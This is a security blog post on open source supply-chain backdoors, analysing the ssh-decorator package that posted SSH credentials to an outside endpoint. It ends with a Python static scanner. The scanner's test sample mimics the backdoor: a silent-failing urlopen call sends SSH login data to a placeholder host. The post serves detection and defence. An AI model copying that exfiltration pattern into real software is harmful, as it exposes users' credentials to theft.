Open Source Backdoors in the Wild
Malicious actors will take advantage of any opportunity to exploit an attack vector for money, personal gain, or fun. For years, hackers have used supply chains to deploy backdoors because trusted software provides a relatively easy entry point. This post explores the techniques and methodologies hackers use to deploy and exploit these backdoors, using the ssh-decorator package as an illustrative example.
First, let’s outline some methods that bad actors use to compromise open source software and supply chains:
Since it is so easy to install packages from a terminal with apt, npm, pip, etc., those looking to infiltrate networks commonly use a software exploitation technique called typo-squatting. Take the django pip package as an example. The word “django” can easily be mistyped as “djamgo.” If this were a malicious package, a user could run the “pip3 install djamgo” command thinking they are installing the correct package, without realizing they have actually installed a potential backdoor and foothold within their network.
This is not a hypothetical case: this real-life example of typo-squatting is already archived on PyPI’s repository. Additional examples and opportunities for exploitation abound.
Backdoors Installed with Setup.py
Setup.py builds, distributes, and installs modules. Some packages can be set up to automatically call out after installation, making setup.py files a highly popular mode for backdoor network infiltration.
Timing-Based Infiltration via Patching
This type of attack is the trickiest to catch and usually happens when network maintainer accounts are compromised or maintainers change. Usually when an attacker gains access to the target network, they will wait for the opportune time to patch in a backdoor in order to exfiltrate data. Once they are satisfied with the data they have collected, they can then revert the change. Now that the “supply” has been compromised, every single module that imports the package is also compromised. It appears this was the method used to compromise the ssh-decorator package, which is analyzed in detail below.
The below image shows the malicious code found in the ssh-decorator package, which the author said someone unlawfully uploaded after gaining access to the network. Let’s walk through what this code actually does.
One common property of backdoors or callbacks is the use of HTTP URLs. After urllib is imported, there’s an HTTP endpoint, “http://ssh-decorate.cf/index.php”.
Analyzing the urlopen function in this example, we can see the infiltrator is recording SSH login data then posting it to this “http://ssh-decorate.cf/index.php” endpoint over HTTP. After “try:”, you see the post variable is the urlencoded log function data. Then the handler variable uses the urlopen function, which is imported from urllib, to send the post data to the url.
Another giveaway that this is not a normal log function is the use of exception hiding.
If the urllib.request and urllib.parse imports fail and an exception is raised, then there’s a backup plan implemented with urllib2.
Further specifics of the log backdoor function, shown below, detail what data from the SSH connection is being logged then posted to the callback url. As you can see, the server, port, private key, password, and user are all being logged. Not only is the infiltrator compromising one user’s critically sensitive data; he or she is also sending the data as plain text over HTTP, meaning the calls can be captured with any proxy or tool like Wireshark to further compromise anyone using the ssh-decorator package.
The below image shows the log function with the parameters sent in a post request.
Ways to Prevent Supply Chain Compromise & Detect Backdoors in Open Source Software
The first and recommended approach to guarantee your organization’s software supply chain is protected against open source exploitation is maintaining your own validated and thoroughly vetted third party source code repository.
Other analytic techniques to detect backdoors before they wreak havoc on your organization’s network can be used in combination and include:
- Analyzing the software’s commit history with a static analysis tool like gitinspector;
- Installing the package in a sandboxed environment first to monitor its callouts, either with Wireshark or at the network level; and
- Once the source is validated, hashing the files from the repository and comparing them before compiling or installing, in order to make sure the files were not modified en route.
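As a complement to the techniques listed above, the three traits called out in the ssh-decorator walkthrough (a hard-coded http:// endpoint, a urlopen call, and exception hiding) can be checked statically before a package is ever installed. The following is an added example, not code from the original post or from the ssh-decorator project; the function names, the finding labels, and the sample source (including its placeholder URL) are constructed for illustration.

```python
import ast

# Constructed sample: mimics the traits described in the post, not the real package code.
SAMPLE = '''
try:
    from urllib.request import urlopen
    from urllib.parse import urlencode
except:
    from urllib2 import urlopen
    from urllib import urlencode

def log(server, port, user, password, pkey):
    try:
        post = urlencode({"server": server, "user": user})
        handler = urlopen("http://collector.example.invalid/index.php", post.encode())
    except:
        pass
'''

def scan(source):
    """Return sorted (line, finding) tuples for the traits discussed above."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        # Trait 1: hard-coded cleartext HTTP endpoint in a string literal
        if isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and node.value.lower().startswith("http://"):
            findings.append((node.lineno, "hardcoded-http-url"))
        # Trait 2: call to urlopen (bare name or attribute, e.g. urllib.request.urlopen)
        elif isinstance(node, ast.Call):
            f = node.func
            name = f.id if isinstance(f, ast.Name) else getattr(f, "attr", None)
            if name == "urlopen":
                findings.append((node.lineno, "urlopen-call"))
        # Trait 3: exception hiding: bare/broad except whose body is only pass
        elif isinstance(node, ast.ExceptHandler):
            broad = node.type is None or (isinstance(node.type, ast.Name)
                    and node.type.id in ("Exception", "BaseException"))
            if broad and all(isinstance(s, ast.Pass) for s in node.body):
                findings.append((node.lineno, "silent-except"))
    return sorted(findings)

def is_suspicious(source):
    """Flag only when network send and silent failure appear together."""
    kinds = {k for _, k in scan(source)}
    return {"urlopen-call", "silent-except"} <= kinds

if __name__ == "__main__":
    for line, kind in scan(SAMPLE):
        print(f"line {line}: {kind}")
```

The source is only parsed, never executed, so the check is safe to run on untrusted packages; treat a hit as a prompt for manual review rather than proof of a backdoor.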
Following these security precautions helps ensure your organization remains resilient against open source software threats well into the future.